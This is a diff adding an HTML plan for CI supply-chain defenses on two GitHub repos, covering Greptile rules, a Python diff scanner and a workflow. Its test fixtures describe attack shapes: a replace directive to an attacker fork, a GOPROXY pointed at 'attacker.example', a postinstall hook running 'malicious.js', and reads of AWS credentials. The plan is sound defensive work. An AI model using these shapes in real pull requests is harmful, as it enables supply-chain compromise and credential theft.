+  <li><span class="badge ok">SAFE</span> <code>cli-printing-press</code> has exactly one <code>pull_request_target</code> workflow (<code>.github/workflows/conversation-resolution-check.yml</code>). Permissions are <code>contents: read</code>, <code>pull-requests: read</code>; no checkout of PR head, no <code>id-token</code>.</li>
+  <li><span class="badge ok">SAFE</span> <code>cli-printing-press</code> has no <code>id-token: write</code> anywhere; <code>release.yml</code> uses keyed cosign rather than keyless OIDC signing.</li>
+  <li><span class="badge advise">EXISTS</span> <code>library/food-and-dining/ordertogo/go.mod</code> has three <code>replace</code> directives, all pointing at local relative paths (<code>./third_party/...</code>). These pre-date this plan and are legitimate vendoring; the rule design accounts for them (see <a href="#kd5">KD5</a>).</li>
+  <li><span class="badge ok">CLEAN</span> No <code>GOPROXY</code>, <code>GOFLAGS</code>, or <code>GONOSUMCHECK</code> overrides in any workflow in either repo.</li>
+  <li><span class="badge ok">CLEAN</span> Every <code>library/&lt;cat&gt;/&lt;slug&gt;/go.mod</code> spot-checked uses the canonical <code>module github.com/mvanhorn/printing-press-library/library/&lt;cat&gt;/&lt;slug&gt;</code> form.</li>
+</ul>
+
+<p class="callout"><b>Audit conclusion:</b> both repos are in good baseline posture. The new rules are forward-looking gates, not retroactive fixes. No <em>existing</em> code needs to change for the audit to clear — only new entries on PRs will trip the gates.</p>
+
+<h3>Implicit assumptions documented</h3>
+
+<ul>
+  <li>The <code>module_path</code> attack surface lives in <code>library/&lt;cat&gt;/&lt;slug&gt;/go.mod</code>'s <code>module</code> directive (verified — there is no <code>module_path</code> field in <code>.printing-press.json</code>).</li>
+  <li>The npm wrapper's blast radius dominates per-CLI Go binary blast radius: a compromised <code>@mvanhorn/printing-press</code> reaches every user via <code>npx</code> on install, whereas a single compromised Go CLI only reaches users who installed that one slug.</li>
+  <li>The generator repo's bugs that produce broken published CLIs are not in scope here; this plan defends against malicious <em>PRs</em>, not template regressions.</li>
+</ul>
+
+<h2 id="scope">Scope Boundaries <a href="#scope" class="anchor">#</a></h2>
+
+<h3>In scope</h3>
+<ul>
+  <li>Six new <code>greptile.json</code> rules in <code>printing-press-library</code> (R1–R6).</li>
+  <li>One Python scan script under <code>.github/scripts/verify-supply-chain/</code> in <code>printing-press-library</code> (R7).</li>
+  <li>One new CI workflow <code>verify-supply-chain.yml</code> in <code>printing-press-library</code> (R8).</li>
+  <li>AGENTS.md section + solutions doc in <code>printing-press-library</code>.</li>
+  <li>Mirror of the rules, script, and workflow into <code>cli-printing-press</code> (R9), with scope adaptations for the generator-repo surface.</li>
+  <li>Branch-protection request: add <code>verify-supply-chain</code> as a required check once a one-week green window has elapsed on each repo's main.</li>
+</ul>
+
+<h3 id="not-in-scope">Not in scope</h3>
+<ul>
+  <li>Runtime sandboxing of <code>go install</code>, <code>npx</code>, or any user-machine execution.</li>
+  <li>Sigstore/Fulcio signing changes for the npm wrapper (already uses OIDC Trusted Publishing — sufficient).</li>
+  <li>Mandatory 2FA enforcement on the org or per-account.</li>
+  <li>Slack/Discord alerting on scan findings.</li>
+  <li>Slack-based incident-response runbook.</li>
+  <li>Real-time dependency-age checks against the npm registry API (high false-positive rate; rate-limit risk).</li>
+  <li>Retroactive sweep of already-published CLIs for any pattern the new scan flags.</li>
+  <li>Replacing or disabling existing Greptile rules, <code>govulncheck.yml</code>, or any verify-* workflow.</li>
+</ul>
+
+<h3>Deferred to follow-up work</h3>
+<div class="deferred">
+  <ul>
+    <li><b>Parity-check script</b> diffing <code>signals.py</code> between the two repos. Cheap to add, but with a single admin owning both repos and only two surfaces to keep in sync, deliberate coordination is sufficient for the first iteration. Revisit if a second contributor lands meaningful changes to either copy.</li>
+    <li><b>SHA256 IOC matching</b> against known malicious payload hashes (e.g., the TanStack <code>router_init.js</code> hash). Useful once a hash-feed source is selected; out of scope here to avoid coupling the gate to an external feed.</li>
+    <li><b>Base64-array heuristics</b> for obfuscator.io fingerprints. Real signal but high false-positive rate against legitimate bundlers; defer until we see a near-miss attack shape that would have caught it.</li>
+    <li><b>Egress blocking of known C2 hosts</b> (e.g., <code>.getsession.org</code>) at the org perimeter. Outside this repo's surface; route to org-level network policy.</li>
+  </ul>
+</div>
+
+<h2 id="requirements">Requirements <a href="#requirements" class="anchor">#</a></h2>
+
+<table>
+  <thead><tr><th>ID</th><th>Requirement</th><th>Acceptance signal</th></tr></thead>
+  <tbody>
+    <tr><td>R1</td><td>Detect <code>pull_request_target</code> workflows that check out PR head code (the TanStack root cause).</td><td>A fixture workflow with <code>pull_request_target</code> trigger + <code>ref: ${{ github.event.pull_request.head.sha }}</code> on <code>actions/checkout</code> is hard-failed by the scan and called out by Greptile.</td></tr>
+    <tr><td>R2</td><td>Detect <code>id-token: write</code> granted outside the publishing allowlist (<code>npm-publish.yml</code> in published-library; none in generator repo).</td><td>A fixture workflow granting <code>id-token: write</code> in any other workflow is hard-failed.</td></tr>
+    <tr><td>R3</td><td>Detect new <code>replace</code> directives in <code>library/&lt;cat&gt;/&lt;slug&gt;/go.mod</code>, tiered by target: remote URL targets hard-fail; local-path targets warn.</td><td>A PR adding <code>replace X =&gt; github.com/...</code> blocks; a PR adding <code>replace X =&gt; ./local-fork</code> emits an advisory but does not block.</td></tr>
+    <tr><td>R4</td><td>Detect <code>GOPROXY</code>, <code>GOFLAGS</code>, or <code>GONOSUMCHECK</code> overrides anywhere in <code>.github/workflows/**</code>.</td><td>Any workflow with <code>env: { GOPROXY: ... }</code> at job or step level is hard-failed.</td></tr>
+    <tr><td>R5</td><td>Detect new lifecycle scripts (<code>preinstall</code>, <code>postinstall</code>, <code>prepare</code>) added to <code>npm/package.json</code>.</td><td>A PR adding any of these scripts to the npm wrapper's <code>package.json</code> is hard-failed.</td></tr>
+    <tr><td>R6</td><td>Detect <code>module</code> directive drift on an existing CLI's <code>go.mod</code> (must continue to begin with <code>github.com/mvanhorn/printing-press-library/library/</code>).</td><td>A PR rewriting an existing <code>library/&lt;cat&gt;/&lt;slug&gt;/go.mod</code>'s <code>module</code> line to a non-canonical path is hard-failed.</td></tr>
+    <tr><td>R7</td><td>Greptile flags (judgment, not hard-fail) Go source under <code>library/**/internal/**/*.go</code> and <code>library/**/cmd/**/*.go</code> that reads home-dir credential paths or sensitive env vars.</td><td>A PR introducing literal <code>".aws/credentials"</code> or <code>os.Getenv("AWS_SECRET_ACCESS_KEY")</code> in a non-auth CLI is flagged by Greptile with a rationale comment.</td></tr>
+    <tr><td>R8</td><td>The <code>verify-supply-chain</code> workflow runs on every PR that touches the relevant scopes and posts structured findings via GitHub Actions annotations.</td><td>A representative PR triggers the workflow, annotations appear on the PR, exit code matches signal severity.</td></tr>
+    <tr><td>R9</td><td>The same rules, script, and workflow exist in <code>cli-printing-press</code>, with scope adaptations: no <code>npm/package.json</code> rule (no wrapper there), no <code>module</code>-drift rule (no published CLIs), <code>replace</code>-directive rule scoped to generator output, not the generator's own <code>go.mod</code>.</td><td>A representative PR in <code>cli-printing-press</code> with the same attack shape triggers the same workflow.</td></tr>
+    <tr><td>R10</td><td>Documentation in both repos names the new rules, the new workflow, and the four incidents that motivated them.</td><td><code>grep -n "supply chain" AGENTS.md</code> returns the new section heading in both repos; the solutions doc cites all four primary sources.</td></tr>
+  </tbody>
+</table>
+
+<h2 id="decisions">Key Technical Decisions <a href="#decisions" class="anchor">#</a></h2>
+
+<h3 id="kd1">KD1: Extend existing <code>greptile.json</code> rather than create a new config file</h3>
+<p>The repo already uses <code>greptile.json</code> with six <code>customContext.rules</code> entries. Append the new rules; do not introduce a parallel config. One config file, one review surface.</p>
+
+<h3 id="kd2">KD2: Two-layer defense, by signal type</h3>
+<p>Mechanical signals (regex matches, JSON key presence, specific string literals) go to the Python scan and hard-fail with structured GitHub Actions error annotations. Judgment signals (does this Go source actually read credentials in context? is this <code>replace</code> directive's stated purpose plausible?) go to Greptile rules that surface rationale in a PR comment. Each layer plays to its strength.</p>
+
+<h3 id="kd3">KD3: Path-scoped rules over global rules</h3>
+<p>Every new rule names a path glob. Avoids noise on generated output, minified files, and legitimate auth surfaces. Follows existing repo precedent (<code>scope: ["library/**/.printing-press.json"]</code> on every customContext rule today).</p>
+
+<h3 id="kd4">KD4: Treat the npm wrapper as a first-class blast-radius surface</h3>
+<p>A compromised <code>@mvanhorn/printing-press</code> reaches every user via <code>npx</code>. A compromised single Go CLI only reaches users who installed that slug. The npm-wrapper lifecycle-script rule (R5) is a hard-fail; per-CLI rules are tiered.</p>
+
+<h3 id="kd5">KD5: <code>replace</code> directive tiering (the <code>ordertogo</code> precedent)</h3>
+<p>The existing <code>library/food-and-dining/ordertogo/go.mod</code> has three <code>replace</code> directives pointing at <code>./third_party/...</code> for legitimate vendoring. A blanket-block rule would either grandfather <code>ordertogo</code> via allowlist (drift risk) or fire on its next reprint (false alarm). Instead, tier by target shape:</p>
+<ul>
+  <li><span class="badge block">block</span> <code>replace X =&gt; github.com/...</code> or any URL/host target.</li>
+  <li><span class="badge advise">advise</span> <code>replace X =&gt; ./local/path</code> or <code>../path</code>. Greptile flags for review; scan emits notice, does not block.</li>
+</ul>
+<p>This is consistent with the BufferZoneCorp attack shape (remote redirect to attacker fork) without false-positiving on legitimate local vendoring.</p>
+
+<h3 id="kd6">KD6: Coordinated landing, but staged main merges</h3>
+<p>The two repo PRs are authored together by the same person with admin access on both. Land the <code>printing-press-library</code> PR first, observe one week of clean runs, then land the <code>cli-printing-press</code> mirror. Rationale: false-positive calibration on the larger repo (more PR throughput, more diverse touch surface) before duplicating any miscalibration into the upstream generator. Both PRs are written in parallel; merge order is the discipline.</p>
+
+<h3 id="kd7">KD7: Required-check promotion happens <em>after</em> a green window, not at merge</h3>
+<p>The new workflow runs informationally on every PR for one week. After a week of clean runs (no spurious failures on legitimate PRs), promote to a required check via branch protection. Avoids day-one merge-blocker pain if a rule mis-fires on a real PR.</p>
+
+<h2 id="design">High-Level Technical Design <a href="#design" class="anchor">#</a></h2>
+
+<p>Two-layer defense, mirrored across both repos. Below shows the per-PR flow; the mirror is structurally identical with scope adaptations per <a href="#requirements">R9</a>.</p>
+
+<svg class="diagram" viewBox="0 0 760 460" xmlns="http://www.w3.org/2000/svg" role="img" aria-label="Two-layer defense flow for a PR">
+  <defs>
+    <marker id="arrow" viewBox="0 0 10 10" refX="9" refY="5" markerWidth="8" markerHeight="8" orient="auto-start-reverse">
+      <path d="M 0 0 L 10 5 L 0 10 z" fill="#555"/>
+    </marker>
+    <style>
+      .box { fill: #fff; stroke: #555; stroke-width: 1.5; }
+      .box-greptile { fill: #eaf0fb; stroke: #1f5fbb; }
+      .box-scan { fill: #fdeeef; stroke: #a4282d; }
+      .box-doc { fill: #f7f7f8; stroke: #555; stroke-dasharray: 4 3; }
+      .box-merge { fill: #e7f4ec; stroke: #1f6b3a; stroke-width: 2; }
+      .lbl { font: 13px -apple-system, sans-serif; fill: #1a1a1a; }
+      .lbl-bold { font: 600 13px -apple-system, sans-serif; fill: #1a1a1a; }
+      .lbl-small { font: 11px -apple-system, sans-serif; fill: #555; }
+      .arrow { stroke: #555; stroke-width: 1.5; fill: none; marker-end: url(#arrow); }
+      .lane { font: 600 11px -apple-system, sans-serif; fill: #555; letter-spacing: 0.05em; }
+    </style>
+  </defs>
+
+  <text x="380" y="22" text-anchor="middle" class="lbl-bold">Per-PR flow: layered supply-chain defense</text>
+
+  <!-- PR entry -->
+  <rect x="320" y="40" width="120" height="44" rx="6" class="box"/>
+  <text x="380" y="60" text-anchor="middle" class="lbl-bold">PR opened</text>
+  <text x="380" y="76" text-anchor="middle" class="lbl-small">or push to branch</text>
+
+  <!-- Split arrows -->
+  <path d="M 360 84 L 180 130" class="arrow"/>
+  <path d="M 400 84 L 580 130" class="arrow"/>
+
+  <!-- Lane labels -->
+  <text x="180" y="115" text-anchor="middle" class="lane">JUDGMENT LAYER</text>
+  <text x="580" y="115" text-anchor="middle" class="lane">MECHANICAL LAYER</text>
+
+  <!-- Greptile lane -->
+  <rect x="80" y="130" width="200" height="80" rx="6" class="box box-greptile"/>
+  <text x="180" y="152" text-anchor="middle" class="lbl-bold">greptile.json rules</text>
+  <text x="180" y="170" text-anchor="middle" class="lbl-small">R1, R2, R3 (advise tier),</text>
+  <text x="180" y="184" text-anchor="middle" class="lbl-small">R4, R5, R6, R7</text>
+  <text x="180" y="200" text-anchor="middle" class="lbl-small">Posts review w/ rationale</text>
+
+  <!-- Scan lane -->
+  <rect x="480" y="130" width="200" height="80" rx="6" class="box box-scan"/>
+  <text x="580" y="152" text-anchor="middle" class="lbl-bold">verify-supply-chain</text>
+  <text x="580" y="170" text-anchor="middle" class="lbl-small">scan.py + signals.py</text>
+  <text x="580" y="184" text-anchor="middle" class="lbl-small">Hard-fail: R1, R2, R3 (block),</text>
+  <text x="580" y="200" text-anchor="middle" class="lbl-small">R4, R5, R6</text>
+
+  <!-- Greptile output -->
+  <rect x="80" y="240" width="200" height="50" rx="6" class="box"/>
+  <text x="180" y="260" text-anchor="middle" class="lbl">Greptile Review</text>
+  <text x="180" y="278" text-anchor="middle" class="lbl-small">P0/P1/P2 findings + score</text>
+  <path d="M 180 210 L 180 240" class="arrow"/>
+
+  <!-- Scan output -->
+  <rect x="480" y="240" width="200" height="50" rx="6" class="box"/>
+  <text x="580" y="260" text-anchor="middle" class="lbl">GitHub Actions annotations</text>
+  <text x="580" y="278" text-anchor="middle" class="lbl-small">::error / ::notice / exit code</text>
+  <path d="M 580 210 L 580 240" class="arrow"/>
+
+  <!-- AGENTS.md context (sidecar) -->
+  <rect x="320" y="240" width="120" height="50" rx="6" class="box box-doc"/>
+  <text x="380" y="260" text-anchor="middle" class="lbl">AGENTS.md §</text>
+  <text x="380" y="278" text-anchor="middle" class="lbl-small">policy reference</text>
+  <path d="M 320 265 L 280 265" class="arrow" stroke-dasharray="3 3"/>
+  <path d="M 440 265 L 480 265" class="arrow" stroke-dasharray="3 3"/>
+
+  <!-- Merge gate -->
+  <rect x="290" y="330" width="180" height="60" rx="6" class="box box-merge"/>
+  <text x="380" y="354" text-anchor="middle" class="lbl-bold">Branch protection gate</text>
+  <text x="380" y="372" text-anchor="middle" class="lbl-small">scan = required (after green window)</text>
+  <text x="380" y="384" text-anchor="middle" class="lbl-small">Greptile = blocking via policy gate</text>
+  <path d="M 180 290 L 320 330" class="arrow"/>
+  <path d="M 580 290 L 440 330" class="arrow"/>
+
+  <!-- Final outcome -->
+  <text x="380" y="425" text-anchor="middle" class="lbl-bold">Merge or block</text>
+  <path d="M 380 390 L 380 410" class="arrow"/>
+
+</svg>
+
+<p class="lbl-small" style="text-align: center; color: var(--muted); margin-top: -0.5rem;">Same shape mirrors into <code>cli-printing-press</code>; the wrapper-specific rules (R5, R6) drop in the generator copy. See <a href="#units">Implementation Units</a> for the scope adaptations.</p>
+
+<h2 id="output">Output Structure <a href="#output" class="anchor">#</a></h2>
+
+<p>Files created or modified by this plan, by repo. <em>Modifications to existing files are marked <code>[mod]</code>; new files are unmarked.</em></p>
+
+<pre><code>printing-press-library/
+├── greptile.json                                          [mod] U1, U4
+├── AGENTS.md                                              [mod] U5
+├── .github/
+│   ├── scripts/
+│   │   └── verify-supply-chain/                           U2
+│   │       ├── __init__.py
+│   │       ├── scan.py
+│   │       ├── signals.py
+│   │       └── test_scan.py
+│   └── workflows/
+│       └── verify-supply-chain.yml                        U3
+└── docs/
+    └── solutions/
+        └── security/                                      U5 (new subdir)
+            └── 2026-05-supply-chain-hardening.md
+
+cli-printing-press/
+├── greptile.json                                          [mod or new] U6
+├── AGENTS.md                                              [mod] U8
+└── .github/
+    ├── scripts/
+    │   └── verify-supply-chain/                           U7 (vendored from U2)
+    │       ├── __init__.py
+    │       ├── scan.py
+    │       ├── signals.py
+    │       └── test_scan.py
+    └── workflows/
+        └── verify-supply-chain.yml                        U7</code></pre>
+
+<p>The per-unit <code>**Files:**</code> sections below remain authoritative for what each unit creates or modifies.</p>
+
+<h2 id="units">Implementation Units <a href="#units" class="anchor">#</a></h2>
+
+<p>Suggested landing order: <b>PR A</b> = U1 + U2 + U3 + U4 + U5 into <code>printing-press-library</code>. <b>PR B</b> = U6 + U7 + U8 into <code>cli-printing-press</code>. PR A merges first; one-week green window observed before PR B merges. See <a href="#kd6">KD6</a>.</p>
+
+<div class="unit" id="u1">
+  <h3>U1. Add mechanical-signal Greptile rules to <code>printing-press-library</code></h3>
+  <div class="field"><b>Goal:</b> Extend <code>greptile.json</code> with six new <code>customContext.rules</code> entries covering R1–R6 attack shapes. Greptile reviews every PR and posts a comment with rationale; this is the judgment layer that explains <em>why</em> the rule fired even when the mechanical scan also blocks.</div>
+  <div class="field"><b>Requirements:</b> R1, R2, R3, R4, R5, R6.</div>
+  <div class="field"><b>Dependencies:</b> none.</div>
+  <div class="field"><b>Files:</b>
+    <ul>
+      <li><code>greptile.json</code> [mod]</li>
+    </ul>
+  </div>
+  <div class="field"><b>Approach:</b> Append six entries to <code>customContext.rules</code>. Each follows the existing rule shape: <code>{"scope": [...path globs...], "rule": "..."}</code>. The rule prose names the attack shape, the file shape that would trip it, and an explicit allowlist where one applies (e.g., <code>npm-publish.yml</code> for <code>id-token: write</code>). Greptile severity is implicit — rules are written as "Flag X" / "P0. Block X" matching the existing patterns.
+    <ul>
+      <li><b>R1 rule:</b> scope <code>.github/workflows/**</code>. Detect any workflow that combines <code>pull_request_target</code> trigger with a checkout step whose <code>ref</code> references <code>github.event.pull_request.head.sha</code>, <code>github.event.pull_request.head.ref</code>, or <code>refs/pull/&lt;n&gt;/merge</code>. This is the TanStack root cause.</li>
+      <li><b>R2 rule:</b> scope <code>.github/workflows/**</code>. Detect <code>id-token: write</code> anywhere except inside <code>npm-publish.yml</code>. Reference the OIDC Trusted Publishing allowlist.</li>
+      <li><b>R3 rule:</b> scope <code>library/**/go.mod</code>. Detect new <code>replace</code> directives. Two tiers: hard-flag (P0) when the target is a URL/host (<code>github.com/...</code>, <code>http*://...</code>); advisory (P1) when the target is a local relative path. Reference the BufferZoneCorp attack shape.</li>
+      <li><b>R4 rule:</b> scope <code>.github/workflows/**</code>. Detect <code>GOPROXY</code>, <code>GOFLAGS</code>, or <code>GONOSUMCHECK</code> appearing in <code>env:</code> blocks at workflow, job, or step level.</li>
+      <li><b>R5 rule:</b> scope <code>npm/package.json</code>. Detect newly-added <code>preinstall</code>, <code>postinstall</code>, or <code>prepare</code> entries under the <code>scripts</code> object. Reference Axios and TanStack as primary motivators.</li>
+      <li><b>R6 rule:</b> scope <code>library/**/go.mod</code>. When the file existed on <code>origin/main</code>, the <code>module</code> directive must continue to begin with <code>github.com/mvanhorn/printing-press-library/library/</code>. Flag any rewrite to an external module path.</li>
+    </ul>
+  </div>
+  <div class="field"><b>Patterns to follow:</b> The existing six entries in <code>customContext.rules</code> (<code>library/**/.printing-press.json</code> rules, the <code>cli-skills/pp-*/SKILL.md</code> P0 rule) — same prose voice (declarative, names the attack, names the allowlist).</div>
+  <div class="field"><b>Test scenarios:</b>
+    <ul>
+      <li>Fixture PR adds a workflow with <code>on: pull_request_target</code> + <code>steps: - uses: actions/checkout@v4 with: { ref: ${{ github.event.pull_request.head.sha }} }</code> → Greptile flags R1 with TanStack reference.</li>
+      <li>Fixture PR adds <code>permissions: { id-token: write }</code> to a non-publish workflow → Greptile flags R2.</li>
+      <li>Fixture PR adds <code>replace github.com/example/foo =&gt; github.com/attacker/fork v1.0.0</code> to <code>library/payments/kalshi/go.mod</code> → Greptile flags R3 hard-tier.</li>
+      <li>Fixture PR adds <code>replace github.com/example/foo =&gt; ./vendor/foo</code> to a library go.mod → Greptile flags R3 advisory-tier (does not demand block).</li>
+      <li>Fixture PR sets <code>env: { GOPROXY: "https://mirror.example/" }</code> in a workflow job → Greptile flags R4.</li>
+      <li>Fixture PR adds <code>"postinstall": "node setup.js"</code> to <code>npm/package.json</code> → Greptile flags R5.</li>
+      <li>Fixture PR rewrites the <code>module</code> line in an existing <code>library/&lt;cat&gt;/&lt;slug&gt;/go.mod</code> from canonical to <code>github.com/attacker/fork/...</code> → Greptile flags R6.</li>
+      <li>Fixture PR bumps a Go dependency in <code>library/&lt;cat&gt;/&lt;slug&gt;/go.mod</code> normally (no <code>replace</code>, no <code>module</code> change) → no rule fires.</li>
+    </ul>
+  </div>
+  <div class="field"><b>Verification:</b> <code>jq . greptile.json</code> validates as JSON; manual sandbox PR for each fixture above produces the expected Greptile comment within the existing 17-minute window the policy gate already waits on.</div>
+</div>
+
+<div class="unit" id="u2">
+  <h3>U2. Build Python scan script under <code>.github/scripts/verify-supply-chain/</code></h3>
+  <div class="field"><b>Goal:</b> Implement the mechanical layer — a deterministic Python script that consumes the PR diff and emits structured GitHub Actions annotations for each signal, exiting non-zero on any block-severity finding.</div>
+  <div class="field"><b>Requirements:</b> R1, R2, R3 (block tier only), R4, R5, R6, R7 (advisory severity), R8.</div>
+  <div class="field"><b>Dependencies:</b> none (script can be developed and tested standalone before wiring into CI).</div>
+  <div class="field"><b>Files:</b>
+    <ul>
+      <li><code>.github/scripts/verify-supply-chain/__init__.py</code></li>
+      <li><code>.github/scripts/verify-supply-chain/scan.py</code></li>
+      <li><code>.github/scripts/verify-supply-chain/signals.py</code></li>
+      <li><code>.github/scripts/verify-supply-chain/test_scan.py</code></li>
+    </ul>
+  </div>
+  <div class="field"><b>Execution note:</b> Develop test-first. Write <code>test_scan.py</code> against the fixture-PR shapes enumerated below before <code>scan.py</code> grows past a skeleton. This is a security gate — false negatives are silent and expensive.</div>
+  <div class="field"><b>Approach:</b>
+    <ul>
+      <li><code>scan.py</code> is the entry point: parses CLI args (<code>--base-ref</code>, <code>--head-ref</code>, optional <code>--strict</code>), computes the diff via <code>subprocess.run(['git', 'diff', ...])</code>, iterates files, dispatches each touched file to its signal matchers in <code>signals.py</code>.</li>
+      <li><code>signals.py</code> defines the pattern catalog. Each signal is a small function or dataclass with: a path-glob predicate, a content predicate (regex or AST-light parsing for go.mod and YAML), a severity (<code>block</code> or <code>advise</code>), a one-line message template, and a one-line remediation hint.</li>
+      <li>Output format: GitHub Actions annotations — <code>::error file=...,line=...::&lt;message&gt;</code> for block, <code>::notice file=...,line=...::&lt;message&gt;</code> for advise. This is the same pattern <code>verify_publish_package.py</code> uses.</li>
+      <li>Exit code: <code>0</code> if no block-severity findings, <code>1</code> if any block-severity finding. Advisory findings do not affect exit code.</li>
+      <li><code>--strict</code> flag escalates advisories to block; off by default. Used in dispatch-only debugging, not the workflow.</li>
+      <li>Signal implementations:
+        <ul>
+          <li><b>R1:</b> YAML-parse touched <code>.github/workflows/*.yml</code> files; for each top-level <code>on:</code> with <code>pull_request_target</code>, walk jobs/steps looking for <code>uses: actions/checkout</code> with a <code>with.ref</code> value containing <code>head.sha</code>, <code>head.ref</code>, or <code>refs/pull/</code>.</li>
+          <li><b>R2:</b> YAML-parse touched <code>.github/workflows/*.yml</code> files; emit error if <code>permissions.id-token: write</code> appears at workflow or job level and the filename is not <code>npm-publish.yml</code>.</li>
+          <li><b>R3:</b> Line-diff parse touched <code>library/**/go.mod</code>; for each added line matching <code>^replace\s+\S+\s+=&gt;\s+(\S+)</code>, classify target: starts with <code>./</code> or <code>../</code> → advise; contains <code>://</code> or matches <code>^[a-z]+\.[a-z]+/</code> → block.</li>
+          <li><b>R4:</b> Line-diff parse touched <code>.github/workflows/*.yml</code>; emit error if added lines define <code>GOPROXY</code>, <code>GOFLAGS</code>, or <code>GONOSUMCHECK</code> inside an <code>env:</code> block.</li>
+          <li><b>R5:</b> JSON-parse <code>npm/package.json</code> at base and head; emit error for any key in <code>scripts</code> at head that is in <code>{preinstall, postinstall, prepare}</code> and was not in base.</li>
+          <li><b>R6:</b> For each touched <code>library/**/go.mod</code>, fetch base copy via <code>git show &lt;base-ref&gt;:&lt;path&gt;</code>. If the file existed at base, extract <code>module</code> directive from both; emit error if head's value does not start with <code>github.com/mvanhorn/printing-press-library/library/</code>.</li>
+        </ul>
+      </li>
+    </ul>
+  </div>
+  <div class="field"><b>Patterns to follow:</b>
+    <ul>
+      <li><code>.github/scripts/verify-publish-package/verify_publish_package.py</code> — argparse, <code>subprocess</code> for git, <code>pathlib.Path</code>, dataclass <code>Problem</code>, GH-annotation escape helper, <code>REPO_ROOT = Path(__file__).resolve().parents[3]</code>.</li>
+      <li><code>.github/scripts/verify-skill/verify_skill.py</code> — predicate-style signal matchers, <code>COMMON_FLAGS</code> allowlist set pattern (mirror this for the <code>npm-publish.yml</code> allowlist).</li>
+    </ul>
+  </div>
+  <div class="field"><b>Test scenarios:</b>
+    <ul>
+      <li><b>R1 happy path:</b> diff adds a workflow with safe <code>pull_request_target</code> and no checkout ref override → no findings. Covers AE1.</li>
+      <li><b>R1 attack shape:</b> diff adds a workflow with <code>pull_request_target</code> + <code>ref: ${{ github.event.pull_request.head.sha }}</code> → block, exit 1.</li>
+      <li><b>R2 attack shape:</b> diff adds <code>id-token: write</code> in <code>verify-skills.yml</code> → block, exit 1.</li>
+      <li><b>R2 allowlist:</b> diff modifies <code>npm-publish.yml</code> with <code>id-token: write</code> already present → no finding.</li>
+      <li><b>R3 block tier:</b> diff adds <code>replace example.com/foo =&gt; github.com/attacker/foo v0.0.1</code> to a library go.mod → block, exit 1.</li>
+      <li><b>R3 advise tier:</b> diff adds <code>replace example.com/foo =&gt; ./vendor/foo</code> to a library go.mod → notice, exit 0.</li>
+      <li><b>R3 existing-untouched:</b> a PR that does not modify <code>library/food-and-dining/ordertogo/go.mod</code> produces zero findings even though that file contains three legitimate <code>replace</code> directives. Regression guard against scanning beyond the diff.</li>
+      <li><b>R4 attack shape:</b> diff adds <code>env: { GOPROXY: "https://attacker.example/" }</code> to a workflow → block, exit 1.</li>
+      <li><b>R5 attack shape:</b> diff adds <code>"postinstall": "node ./malicious.js"</code> to <code>npm/package.json</code> → block, exit 1.</li>
+      <li><b>R5 legitimate:</b> diff modifies an existing legitimate <code>prepublishOnly</code> script (already present in <code>npm/package.json</code>) → no finding (not in the watched set).</li>
+      <li><b>R6 attack shape:</b> diff rewrites <code>module github.com/mvanhorn/...</code> to <code>module github.com/attacker/fork</code> in an existing go.mod → block, exit 1.</li>
+      <li><b>R6 new CLI:</b> diff adds a brand-new <code>library/&lt;cat&gt;/&lt;slug&gt;/go.mod</code> with canonical module path → no finding.</li>
+      <li><b>R6 new CLI bad path:</b> diff adds a brand-new go.mod with non-canonical module path → block, exit 1.</li>
+      <li><b>Mixed clean PR:</b> diff touches only Go source under an existing CLI's <code>internal/cli/</code> with no go.mod changes, no workflow changes, no npm changes → no findings.</li>
+      <li><b>Strict mode:</b> with <code>--strict</code>, R3 advise-tier promotes to block → exit 1.</li>
+    </ul>
+  </div>
+  <div class="field"><b>Verification:</b> <code>python3 -m pytest .github/scripts/verify-supply-chain/test_scan.py -v</code> passes all fixtures. <code>python3 -m .github.scripts.verify-supply-chain.scan --base-ref origin/main --head-ref HEAD</code> runs cleanly on a clean checkout of main against itself (zero findings).</div>
+</div>
+
+<div class="unit" id="u3">
+  <h3>U3. Wire scan into CI as a new workflow <code>verify-supply-chain.yml</code></h3>
+  <div class="field"><b>Goal:</b> Run the scan on every PR that touches a relevant scope; surface findings as PR annotations; exit code drives the check pass/fail.</div>
+  <div class="field"><b>Requirements:</b> R8.</div>
+  <div class="field"><b>Dependencies:</b> U2 (script must exist).</div>
+  <div class="field"><b>Files:</b>
+    <ul>
+      <li><code>.github/workflows/verify-supply-chain.yml</code></li>
+    </ul>
+  </div>
+  <div class="field"><b>Approach:</b>
+    <ul>
+      <li>Trigger: <code>pull_request</code> (not <code>pull_request_target</code> — this workflow does not need elevated permissions). Path filter on <code>.github/workflows/**</code>, <code>library/**/go.mod</code>, <code>library/**/go.sum</code>, <code>npm/package.json</code>, <code>npm/package-lock.json</code>.</li>
+      <li>Permissions: <code>contents: read</code> only. No <code>id-token</code>, no write permissions.</li>
+      <li>Job runs Python 3.12, checks out the PR branch (default ref — safe under <code>pull_request</code>), runs <code>scan.py</code> with <code>--base-ref origin/${{ github.base_ref }}</code> and <code>--head-ref HEAD</code>.</li>
+      <li>Concurrency: cancel-in-progress on the same PR.</li>
+      <li>Does <em>not</em> become a required check on day one. After a one-week green window, separately add it to branch protection via <code>matt-github-pat</code> per repo policy.</li>
+    </ul>
+  </div>
+  <div class="field"><b>Patterns to follow:</b>
+    <ul>
+      <li><code>.github/workflows/verify-library-conventions.yml</code> — Python setup, diff-aware trigger, GA annotations.</li>
+      <li><code>.github/workflows/verify-skills.yml</code> — concurrency-group shape, timeout.</li>
+    </ul>
+  </div>
+  <div class="field"><b>Test scenarios:</b>
+    <ul>
+      <li>Sandbox PR with each U2 fixture attack shape → workflow runs, posts annotations, fails red on block-tier signals.</li>
+      <li>Sandbox PR that touches only docs (no path-filter match) → workflow does not trigger.</li>
+      <li>Clean library PR (Go source change inside an existing CLI's <code>internal/</code>, no go.mod or workflow change) → workflow runs (path filter on go.sum is permissive enough), passes green.</li>
+    </ul>
+  </div>
+  <div class="field"><b>Verification:</b> Workflow appears in the Actions tab on a sandbox PR; annotations render on the PR's Files tab; the check's pass/fail mirrors the script exit code.</div>
+</div>
+
+<div class="unit" id="u4">
+  <h3>U4. Add Greptile-only judgment rule for Go credential-path reads</h3>
+  <div class="field"><b>Goal:</b> Catch the node-ipc / TanStack credential-harvesting shape <em>in Go source</em> — a non-auth CLI that suddenly starts reading <code>~/.aws/credentials</code> or harvesting tokens. This rule lives in Greptile only, never in the mechanical scan, because legitimate auth CLIs (GitHub API wrappers, AWS clients) read these paths intentionally.</div>
+  <div class="field"><b>Requirements:</b> R7.</div>
+  <div class="field"><b>Dependencies:</b> none.</div>
+  <div class="field"><b>Files:</b>
+    <ul>
+      <li><code>greptile.json</code> [mod]</li>
+    </ul>
+  </div>
